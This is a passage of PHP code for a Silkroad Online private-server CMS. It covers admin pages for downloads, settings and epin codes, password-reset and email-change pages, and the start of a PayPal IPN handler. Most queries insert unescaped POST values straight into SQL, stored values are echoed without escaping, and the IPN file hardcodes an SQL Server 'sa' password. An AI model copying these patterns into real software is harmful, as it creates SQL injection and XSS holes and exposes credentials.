       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php break;
                        }
                        else
                        {
                            core::$sql -> exec("insert into srcms_downloads(name,link,description) values('$szName','$_POST[link]','$szDesc')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Successfully added link to downloads. <?php echo misc::redirect('?pg=admin&act=dl',3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                    }
                break;
                
                case('del'):
                    if(!isset($_POST['submit']) && !isset($_GET['id']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Uploaded on</td>
        <td>Link</td>
        <td>Name/Time</td>
        <td>Delete</td>
    <tr/>

                             
                             <?php $hLinkList = core::$sql -> exec("select * from srcms_downloads");
                             if(mssql_num_rows($hLinkList) > 0)
                             {
                                while($row = mssql_fetch_array($hLinkList))
                                {?>
    <tr>
        <td><?php echo $row[id];?></td>
        <td><?php echo $row[name];?></td>
        <td><?php echo $row[link];?></td>
        <td><?php echo $row[description];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=dl&subact=del&id=<?php echo $row[id];?>' class="btn-u pull-right">Delete</a></td>
    <tr/>
                                <?php }
                             }
                             else
                             {
                                echo "No links added yet.<br/>";
                             }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $nID = (int)$_GET['id'];
                        if(core::$sql -> numRows("select * from srcms_downloads where id='$nID'") > 0)
                        {
                            core::$sql -> exec("delete from srcms_downloads where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Link successfully deleted. <?php echo misc::redirect('?pg=admin&act=dl', 3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                        else
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        You are trying to delete link with ID that was not found in database. <?php echo misc::redirect('?pg=admin&act=dl', 3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }    
                    
                    }
                break;
                
                case('edit'):
                    if(!isset($_POST['submit']) && !isset($_GET['id']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Uploaded on</td>
        <td>Link</td>
        <td>Name/Time</td>
        <td>Edit</td>
    <tr/>
                                
                                <?php $hLinks = core::$sql -> exec("select * from srcms_downloads");
                                if(mssql_num_rows($hLinks) > 0)
                                {
                                    while($row = mssql_fetch_array($hLinks))
                                    {?>
    <tr>
    <td><?php echo $row[id];?></td>
        <td><?php echo $row[name];?></td>
        <td><?php echo $row[link];?></td>
        <td><?php echo $row[description];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=dl&subact=edit&id=<?php echo $row[id];?>' class="btn-u pull-right">Edit</td>
    <tr/>
                                    <?php }
                                }
                                else
                                {
                                    echo "No links added yet.<br/>";
                                    
                                    break;
                                }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $nID = (int)$_GET['id'];
                        $hLinkData = core::$sql -> exec("select * from srcms_downloads where id='$nID'");
                        if(mssql_num_rows($hLinkData) > 0)
                        {    
                            if(!isset($_POST['link']))
                            {
                                $hArray = mssql_fetch_array($hLinkData);?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        <form class="reg-page" method="post" role="form">
            <h3>Edit Download(<?php echo $hArray[name];?>)</h3>
                <div class="controls">
                    <label>Uploaded on<span class="color-red">*</span></label>
                    <div class="input-prepend">
                        <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                        <input type="text" name="title" autocomplete="off" style="width: 165%" value="<?php echo $hArray[name];?>"/>
                    </div>
                    <label>Link<span class="color-red">*</span></label>
                    <div class="input-prepend">
                        <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                        <input type="text" name="title" autocomplete="off" style="width: 165%" value="<?php echo $hArray[link];?>"/>
                    </div>
                    <label>Name/Time<span class="color-red">*</span></label>
                    <div class="input-prepend">
                        <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                        <input type="text" name="title" autocomplete="off"  style="width: 165%" value="<?php echo $hArray[description];?>"/>
                    </div>
                </div>

            <div class="controls form-inline">
                <?php echo misc::back();?>
                <input type="submit" name="submit" class="btn-u pull-right" value="Save">
            </div>
        </form>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php }
                            else
                            {
                                if(!security::isValidUrl($_POST['link']))
                                {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Invalid URL<br/> <?php echo misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php }
                                else
                                {
                                    $szName = misc::toHTML($_POST['name']);
                                    $szDesc = misc::toHTML($_POST['description']);
                                    core::$sql -> exec("update srcms_downloads set name='$szName',description='$szDesc',link='$_POST[link]' where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Link successfully edited <br/> <?php echo isc::redirect('?pg=admin&act=dl', 3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php }
                            }
                        }
                        else
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Record with ID you requested was not found in database.. <?php echo misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php break;
                        }
                    }
                    
                break;
                default:echo "Unknown subaction"; break;
            }
            #echo "<br/>";
            #misc::back();
        }
    break;
    
    case('settings'):
        if($_POST['submit'] != 'Save')
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Settings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Settings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="reg-page table table-striped" border="0" cellpadding="0" cellspacing="0">
    <form method='post'>
    <tr>
        <td>ValueName</td>
        <td>Value</td>
    <tr/>
            <?php $hSettings = core::$sql -> exec("select * from srcms_settings");
            while($row = mssql_fetch_array($hSettings))
            {?>
    <tr>
        <td><?php echo $row[valueName];?></td>
        <td>
            <div class="input-prepend">
                <span class="add-on"><i class="icon-certificate color-green"></i></span>
                <input type='text' name='<?php echo $row[valueName];?>' value='<?php echo $row[value];?>'>
            </div>
        </td>
    <tr/>
    <?php } ?>
    <tr>
        <td></td>
        <td>
            <div class="controls form-inline">
                <?php echo misc::back();?>
                <input type="submit" name="submit" class="btn-u pull-right" value="Save">
            </div>
        </td>
    </tr>
    </form>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
        <?php }
        else
        {
            foreach($_POST as $nElement => $nElementValue)
            {
                    core::$sql -> exec("update srcms_settings set value='$nElementValue' where valueName='$nElement'");
            }?>            
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Settings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Settings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Settings saved.<br/><?php echo misc::redirect('?pg=admin&act=settings',3 );?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
        <?php }
    break;
    
    case('epin'):
        if(!isset($_GET['subact']))
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Epin System</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Epin System</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<ul class="unstyled">
    <li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=epin&subact=gen'><b>Generate new epin code</b></a></li>
    <li><i class="icon-eye-open color-green"></i> <a href='?pg=admin&act=epin&subact=lookup'><b>Lookup codes</b></a></li>
</ul>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
        <?php }
        else
        {
            switch($_GET['subact'])
            {
                case('gen'):
                    if(!isset($_POST['submit']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Generate new Epin code</h3>
                    <div class="controls">
                        <label>Silk Amount<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text"  name='silkAmount' autocomplete="off" maxlength="16" placeholder="Silk Amount" style="width: 165%" class=""/>
                        </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value='Generate new epin'>
                    </div>
            </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $nRandCode = rand(1000000000,2000000000);
                        if(core::$sql -> numRows("select * from srcms_epin where code='$nRandCode'") == 0)
                        {
                            $nSilk = (int)$_POST['silkAmount'];
                            core::$sql -> exec("insert into srcms_epin(code,silkAmount) values('$nRandCode','$nSilk')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Epin generated, CODE: <b class="color-red"><?php echo $nRandCode;?></b>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                        else
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Please, re-generate code. <?php echo misc::back();?></b>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php break;
                        }
                    }
                break;
                
                case('lookup'):
                    if(core::$sql -> numRows("select * from srcms_epin") > 0)
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        <table class="reg-page table table-striped" border="0" cellpadding="0" cellspacing="0">
            <tr>
                <td>Code</td>
                <td>Silk</td>
            <tr/>
<?php $hCodesData = core::$sql -> exec("select * from srcms_epin");
     while($row = mssql_fetch_array($hCodesData))
        {?>
            <tr>
                <td><b class="color-red"><?php echo $row[code];?></b></td>
                <td><b class="color-green"><?php echo $row[silkAmount];?></b></td>
            <tr/>
    <?php }?>
        </table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Please, generate some epin codes first.
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                break;
                
                default:echo "Unknown subaction<br/>";break;
            }
            
            #echo "<br/>";
            #misc::back();
        }
    break;
    
    
    default:
    echo "Unknown action";
    break;
}
?>

cem

كود PHP:

<?php
    if(isset($_GET['uid']))
    {
        if(security::isSecureString($_GET['uid'], 3))
                {
                $uid = $_GET['uid'];
            if(core::$sql -> numRows("select * from PW_Restore where RandomPASS = '$uid'") == 0)
            {
                echo 'this UID is incorrect or have been changed , request a new UID.';
            } else {
                if(isset($_POST['submit']))
                {
                //process data
                if(!security::isSecureString($_POST['password_new'], 3)) $errors[] = "Password [new] contains forbidden symbols";
                if(strlen($_POST['password_new']) > 32)    $errors[] = "Password [new] too long";
                if(strlen($_POST['password_new']) < 6)    $errors[] = "Passwrod [new] too short";
                if($_POST['password_new'] !== $_POST['password_new_confirm']) $errors[] = "New Passwords does not match!.";

                if(count($errors) > 0)
                {
                foreach($errors as $nElement)
                {
                echo $nElement.".<br/>";
                }
                misc::back();
                }
                else
                {
                //verify
                if(user::RestorePass($_GET['uid'], $_POST['password_new']))
                {
                echo "Password changed successfully. <br/>";
                misc::redirect('?pg=news', 1);
                }
                else
                {
                echo "Invalid old password specified.<br/>";
                misc::back();
                }
                }
                }
                else core::$ucp -> ForgotpwForm();
                }
    } } else {
    echo 'Entry is invalid.';
    }
?>

emailreplace

كود PHP:

<?php
        if (isset($_POST['replacemail1'])) {
    
        if(!security::isSecureString($_SESSION['username'], 3)) $errors[] = "Username field contains forbidden symbols";
        if(!security::isSecureString($_POST['email'], 2))     $errors[] = "Email field contains forbidden symbols";
        if(!security::isCorrectEmail($_POST['email']))         $errors[] = "Invalid email address";

        if(count($errors) > 0)
        {
            for($i = 0; $i < count($errors); $i++)
            {
                echo $errors[$i].".<br/>";
            }
        }
        else
        {
        
        core::$sql -> changeDB('acc');
        $user = $_SESSION['username'];
        $email = $_POST['email'];
        if (empty($_SESSION['username']) || empty($_POST['email'])) {
            echo 'Error :';
            echo '<br />';
            echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
            unset($_POST['replacemail1']);
        } else {
            $check = core::$sql -> numRows("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
            if ($check !== 1) {
                echo 'Error :';
                echo '<br />';
                echo "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>";
                unset($_POST['replacemail1']);
            } else {
                $title = "Your Email Change Link!";
                $getrandom = misc::genRandomString();
                $datetime = gmDate('Y-m-d H:i:s');
                $content = "HolySro Email Change Link : http://holysro.com/?pg=cem&uid=$getrandom \n Get inside to change your Email \n if you didnt request it , please ignore this mail.!";
                mail($email, "[HolySro Email Change] ".$title, $content."\nEmail sent from: www.holysro.com");
                core::$sql -> changeDB('acc');
                $ZsCheck = core::$sql -> numRows("select UserID from Email_Change where UserID = '$user'");
                if ($ZsCheck == 1) {
                core::$sql -> exec("update Email_Change set RandomPASS ='$getrandom' ,createtime = '$datetime',ipaddr = '$_SERVER[REMOTE_ADDR]' where UserID = '$user'");
                } else {
                core::$sql -> exec("insert into Email_Change(UserID,RandomPASS,createtime,ipaddr) values('$user','$getrandom','$datetime','$_SERVER[REMOTE_ADDR]')");
                }
                echo "instructions to Email Change sent to your mailbox [ $email ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>";
                unset($_POST['replacemail1']);
                misc::redirect("?pg=news", 2);
            }
        }
    } } else {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left">Change your email</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Change your email</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <form class="log-page" role="form" method="post" action=""/>
            <h3>Change your email</h3>    
            <div class="input-prepend">
                <span class="add-on"><i class="icon-user"></i></span>
                <input class="input-xlarge" autocomplete="off" onfocus="clearText(this);" type="text" maxlength="32" name="email" placeholder="example: [email protected]" />
            </div>

            <div class="controls form-inline">
                <input class="btn-u pull-right" type="submit" name="replacemail1" value="Send Me Link To Mail" />
            </div><br />
        </form>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
<?php }?>

forgotpw

كود PHP:

<?php
        global $core;
        if (isset($_POST['forgotpassword'])) {
    
        if(!security::isSecureString($_POST['username'], 3)) $errors[] = "Username field contains forbidden symbols";
        if(!security::isSecureString($_POST['email'], 2))     $errors[] = "Email field contains forbidden symbols";
        if(!security::isCorrectEmail($_POST['email']))         $errors[] = "Invalid email address";

        if(count($errors) > 0)
        {
            for($i = 0; $i < count($errors); $i++)
            {
                echo $errors[$i].".<br/>";
            }
        }
        else
        {
        
        core::$sql -> changeDB('acc');
        $user = $_POST['username'];
        $email = $_POST['email'];
        if (empty($_POST['username']) || empty($_POST['email'])) {
            echo 'Error :';
            echo '<br />';
            echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
            unset($_POST['forgotpassword']);
        } else {
            $check = core::$sql -> numRows("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
            if ($check !== 1) {
                echo 'Error :';
                echo '<br />';
                echo "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>";
                unset($_POST['forgotpassword']);
            } else {
                $passw = core::$sql -> exec("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
                while($row = mssql_fetch_array($passw)) {
                    $pass = $row['Name'];
                }
                $title = "Your password!";
                $getrandom = misc::genRandomString();
                $datetime = gmDate('Y-m-d H:i:s');
                $getsiteurl = $_SERVER['SERVER_NAME'];
                $servername = $core -> aConfig['serverName'];
                $content = "$servername Password Reset Link : http://$getsiteurl/?pg=cpw&uid=$getrandom \n Get inside to change your password \n if you didnt request it , please ignore this mail.!";
                mail($email, "[$servername Password Recovery] ".$title, $content."\nEmail sent from: $getsiteurl");
                core::$sql -> changeDB('acc');
                $ZsCheck = core::$sql -> numRows("select UserID from PW_Restore where UserID = '$user'");
                if ($ZsCheck == 1) {
                core::$sql -> exec("update PW_Restore set RandomPASS ='$getrandom' ,createtime = '$datetime',ipaddr = '$_SERVER[REMOTE_ADDR]' where UserID = '$user'");
                } else {
                core::$sql -> exec("insert into PW_Restore(UserID,RandomPASS,createtime,ipaddr) values('$user','$getrandom','$datetime','$_SERVER[REMOTE_ADDR]')");
                }?>
         <!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left">Reset Password</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li class="active">Reset Password</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">       
                
<!-- News -->
<div class="row-fluid purchase margin-bottom-30">
    <div class="container">
        <div class="span8">    
            <div class="headline">
                <h3>Instructions</h3>
            </div>    
                   instructions to reset your password sent to your mailbox [ <code><?php echo $email;?></code> ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>
                <?php unset($_POST['forgotpassword']);?>            
        </div>              
    </div>
</div><!--/row-fluid--><!-- End Purchase Block -->

    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
            <?php }
        }
    } } else {?>
        
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left">Reset Password</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Reset Password</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <form class="log-page" action="" method="post">
            <h3>Reset Password</h3>
                        <p>To start the procedure, please enter your username and mail.</p>
            <div class="input-prepend">
                <span class="add-on"><i class="icon-user"></i></span>
                <input class="input-xlarge" type="text" maxlength="16" name="username" autocomplete="off" onfocus="clearText(this);" placeholder="Username">
            </div>
            
            <div class="input-prepend">
                <span class="add-on"><i class="icon-lock"></i></span>
                <input class="input-xlarge" autocomplete="off" onfocus="clearText(this);" type="text" maxlength="32" name="email" placeholder="[email protected]">
            </div>
            <div class="controls form-inline">
                <button class="btn-u pull-right" class="button" type="submit" name="forgotpassword" value="Request Password">Submit</button>
            </div>
            <br />
        </form>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php }

?>

forums

كود PHP:

<?php
        global $core;
        echo "Redirecting...";
        misc::redirect($core -> aConfig['forumLink'], 2);
?>

ipn

كود PHP:

<?php
$con = mssql_connect('WIN-58LMRAF4MSQ\SQLEXPRESS','sa','hkjhldkdhq@012012')  //  Edit to your Settings (SQL,ID,PW) .
    or die('Could not connect to the server!');
    
// Select a database:
mssql_select_db('SRO_VT_ACCOUNT_Tito')  // Edit to you Account Database!! .
    or die('Could not select a database.');

$ppEmail = '[email protected]'; // Edit This Email to your Paypal!!! .
$personalEmail = '[email protected]'; // Edit This Email to your Paypal!!! . 
$amountUsd = array('5.00','10.00','15.00','25.00','50.00');// Edit The Price Here ! (must be double (XX.XX)!) .
$usdToSilks = array(5=>300, 10=>700, 15=>1100, 25=>2000, 50=>4500);// Edit Silks From Price 10=>500 [10$ = 500 Silk] .

//$amountEur = array(7.00,10.00,14.00,21.00);

// tell PHP to log errors to ipn_errors.log in this directory
ini_set('log_errors', true);
ini_set('error_log', dirname(__FILE__).'/ipn_errors.log');

// intantiate the IPN listener
include('ipnlistener.php');
$listener = new IpnListener();

// tell the IPN listener to use the PayPal test sandbox
$listener->use_sandbox = false;

// try to process the IPN POST
try {
    $listener->requirePostMethod();
    $verified = $listener->processIpn();
} catch (Exception $e) {
    error_log($e->getMessage());
    exit(0);
}

if ($verified) {

    $errmsg = '';   // stores errors from fraud checks
    
    // Make sure the payment status is "Completed" 
    if ($_POST['payment_status'] != 'Completed') { 
        // simply ignore any IPN that is not completed
        exit(0); 
    }

    //  Make sure seller email matches your primary account email.
    if ($_POST['receiver_email'] != $ppEmail) {
        $errmsg .= "'receiver_email' does not match: ";
        $errmsg .= $_POST['receiver_email']."\n";
    }
    
    //checks currency
    if ($_POST['mc_currency'] != 'USD') {
        $errmsg .= "'mc_currency' does not match: ";
        $errmsg .= $_POST['mc_currency']."\n";
    }
    
    // Make sure the amount(s) paid match
    if ($_POST['mc_currency'] = 'USD') {
        if (!in_array($_POST['mc_gross'],$amountUsd)) {
        $errmsg .= "'mc_gross' does not match: ";
        $errmsg .= $_POST['mc_gross']."\n";
        }        
    }
    
/*    if ($_POST['mc_currency'] = 'EUR') {
           if (!in_array(number_format($_POST['mc_gross'],2),number_format($amountEur, 2))) {
        $errmsg .= "'mc_gross' does not match: ";
        $errmsg .= $_POST['mc_gross']."\n";
        }        
    }
*/    

    // Ensure the transaction is not a duplicate.
    
    $txn_id = ms_escape_string($_POST['txn_id']);
    
    $sql = "SELECT * FROM paypal WHERE txn_id = '$txn_id'";
    $r = mssql_query($sql);
    
    if (!$r) {
        error_log(mysql_error());
        exit(0);
    }
    
   // $exists = mssql_query($r, 0);
    $exists = mssql_num_rows($r);
    mssql_free_result($r);
    
    if ($exists<>0) {
        $errmsg .= "'txn_id' has already been processed: ".$_POST['txn_id']."\n";
    }
    
    if (!empty($errmsg)) {
    
